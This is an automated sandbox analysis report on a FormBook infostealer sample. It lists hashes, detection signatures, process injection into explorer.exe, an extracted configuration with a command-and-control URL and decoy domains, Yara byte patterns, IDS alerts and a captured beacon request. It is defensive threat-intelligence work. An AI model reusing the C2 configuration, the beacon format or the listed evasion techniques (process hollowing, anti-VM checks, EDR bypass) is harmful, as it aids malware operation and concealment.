Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TU0kiz3mxz.exe

Overview

General Information

Sample name:TU0kiz3mxz.exe
renamed because original name is a hash value
Original sample name:20fdf7fbe573d9233084f2f338379815159e9c057a5b1189f8007d3ccf0e4204.exe
Analysis ID:1587624
MD5:5bc818a30e4d9d8a6bb828767ca1bf2a
SHA1:b0ce6d58037a4f05cb31eeca7db4ad2c347bc358
SHA256:20fdf7fbe573d9233084f2f338379815159e9c057a5b1189f8007d3ccf0e4204
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TU0kiz3mxz.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\TU0kiz3mxz.exe" MD5: 5BC818A30E4D9D8A6BB828767CA1BF2A)
    • TU0kiz3mxz.exe (PID: 6824 cmdline: "C:\Users\user\Desktop\TU0kiz3mxz.exe" MD5: 5BC818A30E4D9D8A6BB828767CA1BF2A)
    • TU0kiz3mxz.exe (PID: 1148 cmdline: "C:\Users\user\Desktop\TU0kiz3mxz.exe" MD5: 5BC818A30E4D9D8A6BB828767CA1BF2A)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • explorer.exe (PID: 3584 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • cmd.exe (PID: 7120 cmdline: /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 6272 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 4336 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ehills.shop/m25s/"], "decoy": ["araghospitality.net", "cleans.xyz", "olnacasinotcs14.top", "pringhillinfos.net", "erkakasrumah.online", "orean-course-289113002.zone", "yeloma-treatment-82106.bond", "76iw543gw.autos", "nline-shopping-56055.bond", "enetik.xyz", "ax-th-6011838.fyi", "itygatehousing.app", "23zy998jk.bond", "pslag-hal-2.online", "uykoii.shop", "9supjub3p.buzz", "tmgl.bond", "actus-catering-creations.net", "ntercashspace24.homes", "ierra777.vip", "ental-health-69511.bond", "newordforpurpose.info", "roppsple.shop", "edant.ltd", "imitake.xyz", "ransportationmwmptpro.top", "roncrow.biz", "armanshop.xyz", "ealthy-life-products.online", "raphic-design-degree-33148.bond", "ildcraft.xyz", "16-lawn-care.today", "7732.club", "vitor.live", "uy-smart-tv-nl.today", "sone.best", "ellcli.net", "52006.club", "abelzshop.online", "cctofi.cpa", "alisu.xyz", "roformance.shop", "cskuvq.shop", "anforexuytin.cfd", "raceg.cyou", "rimevest-global.info", "ealthcare-trends-60670.bond", "oo.bio", "itodemo.click", "ottah.studio", "teamgame-mod.net", "39474.club", "yai11.top", "onnorbell.design", "dt5r.shop", "6874.club", "wistlnc.net", "ntermoney24cad.homes", "attoomasteracademy.online", "3win4.cyou", "xewaov.xyz", "6uzh.digital", "ransportationwlsltpro.top", "oches-a-credito-es.bond"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x96629:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0xc4a49:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0xf1e69:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0xacf58:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xdb378:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x108798:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x9ad97:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0xc91b7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0xf65d7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0xa5c7f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      • 0xd409f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      • 0x1014bf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x99ce0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x99f4a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xc8100:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xc836a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xf5520:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xf578a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa5a7d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xd3e9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1012bd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xa5569:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xd3989:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x100da9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xa5b7f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xd3f9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1013bf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xa5cf7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xd4117:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x101537:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x9a962:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xc8d82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xf61a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0xa8be1:$sqlite3step: 68 34 1C 7B E1
      • 0xa8cf4:$sqlite3step: 68 34 1C 7B E1
      • 0xd7001:$sqlite3step: 68 34 1C 7B E1
      • 0xd7114:$sqlite3step: 68 34 1C 7B E1
      • 0x104421:$sqlite3step: 68 34 1C 7B E1
      • 0x104534:$sqlite3step: 68 34 1C 7B E1
      • 0xa8c10:$sqlite3text: 68 38 2A 90 C5
      • 0xa8d35:$sqlite3text: 68 38 2A 90 C5
      • 0xd7030:$sqlite3text: 68 38 2A 90 C5
      • 0xd7155:$sqlite3text: 68 38 2A 90 C5
      • 0x104450:$sqlite3text: 68 38 2A 90 C5
      • 0x104575:$sqlite3text: 68 38 2A 90 C5
      • 0xa8c23:$sqlite3blob: 68 53 D8 7F 8C
      • 0xa8d4b:$sqlite3blob: 68 53 D8 7F 8C
      • 0xd7043:$sqlite3blob: 68 53 D8 7F 8C
      • 0xd716b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x104463:$sqlite3blob: 68 53 D8 7F 8C
      • 0x10458b:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.TU0kiz3mxz.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.TU0kiz3mxz.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.TU0kiz3mxz.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.TU0kiz3mxz.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.TU0kiz3mxz.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T15:56:25.112677+010020314531Malware Command and Control Activity Detected192.168.2.44986813.248.169.4880TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: TU0kiz3mxz.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://www.cleans.xyz/m25s/Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ehills.shop/m25s/"], "decoy": ["araghospitality.net", "cleans.xyz", "olnacasinotcs14.top", "pringhillinfos.net", "erkakasrumah.online", "orean-course-289113002.zone", "yeloma-treatment-82106.bond", "76iw543gw.autos", "nline-shopping-56055.bond", "enetik.xyz", "ax-th-6011838.fyi", "itygatehousing.app", "23zy998jk.bond", "pslag-hal-2.online", "uykoii.shop", "9supjub3p.buzz", "tmgl.bond", "actus-catering-creations.net", "ntercashspace24.homes", "ierra777.vip", "ental-health-69511.bond", "newordforpurpose.info", "roppsple.shop", "edant.ltd", "imitake.xyz", "ransportationmwmptpro.top", "roncrow.biz", "armanshop.xyz", "ealthy-life-products.online", "raphic-design-degree-33148.bond", "ildcraft.xyz", "16-lawn-care.today", "7732.club", "vitor.live", "uy-smart-tv-nl.today", "sone.best", "ellcli.net", "52006.club", "abelzshop.online", "cctofi.cpa", "alisu.xyz", "roformance.shop", "cskuvq.shop", "anforexuytin.cfd", "raceg.cyou", "rimevest-global.info", "ealthcare-trends-60670.bond", "oo.bio", "itodemo.click", "ottah.studio", "teamgame-mod.net", "39474.club", "yai11.top", "onnorbell.design", "dt5r.shop", "6874.club", "wistlnc.net", "ntermoney24cad.homes", "attoomasteracademy.online", "3win4.cyou", "xewaov.xyz", "6uzh.digital", "ransportationwlsltpro.top", "oches-a-credito-es.bond"]}
          Multi AV Scanner detection for submitted file
          Source: TU0kiz3mxz.exeVirustotal: Detection: 76%Perma Link
          Source: TU0kiz3mxz.exeReversingLabs: Detection: 91%
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: TU0kiz3mxz.exeJoe Sandbox ML: detected
          Source: TU0kiz3mxz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: TU0kiz3mxz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: explorer.pdbUGP source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Ppqg.pdbSHA2568 source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: TU0kiz3mxz.exe, 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1766250650.0000000004A01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1764277730.0000000004841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TU0kiz3mxz.exe, TU0kiz3mxz.exe, 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000005.00000003.1766250650.0000000004A01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1764277730.0000000004841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Ppqg.pdb source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 4x nop then pop ebx3_2_00407B1B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx5_2_02957B1B

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49868 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49868 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49868 -> 13.248.169.48:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 13.248.169.48 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.ehills.shop/m25s/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.cleans.xyz
          Tries to resolve many domain names, but no domain seems valid
          Source: unknownDNS traffic detected: query: www.yeloma-treatment-82106.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.oches-a-credito-es.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.orean-course-289113002.zone replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.6874.club replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.araghospitality.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.cskuvq.shop replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ehills.shop replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.olnacasinotcs14.top replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.raphic-design-degree-33148.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.attoomasteracademy.online replaycode: Name error (3)
          Source: global trafficHTTP traffic detected: GET /m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW HTTP/1.1Host: www.cleans.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 4_2_0E90FF82 getaddrinfo,setsockopt,recv,4_2_0E90FF82
          Source: global trafficHTTP traffic detected: GET /m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW HTTP/1.1Host: www.cleans.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.orean-course-289113002.zone
          Source: global trafficDNS traffic detected: DNS query: www.6874.club
          Source: global trafficDNS traffic detected: DNS query: www.cleans.xyz
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: global trafficDNS traffic detected: DNS query: www.oches-a-credito-es.bond
          Source: global trafficDNS traffic detected: DNS query: www.yeloma-treatment-82106.bond
          Source: global trafficDNS traffic detected: DNS query: www.araghospitality.net
          Source: global trafficDNS traffic detected: DNS query: www.ehills.shop
          Source: global trafficDNS traffic detected: DNS query: www.cskuvq.shop
          Source: global trafficDNS traffic detected: DNS query: www.olnacasinotcs14.top
          Source: global trafficDNS traffic detected: DNS query: www.attoomasteracademy.online
          Source: global trafficDNS traffic detected: DNS query: www.raphic-design-degree-33148.bond
          Source: explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2969473243.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.0000000009762000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.0000000009744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2969473243.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.0000000009762000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.0000000009744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2969473243.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.0000000009762000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.0000000009744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2969473243.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.0000000009762000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 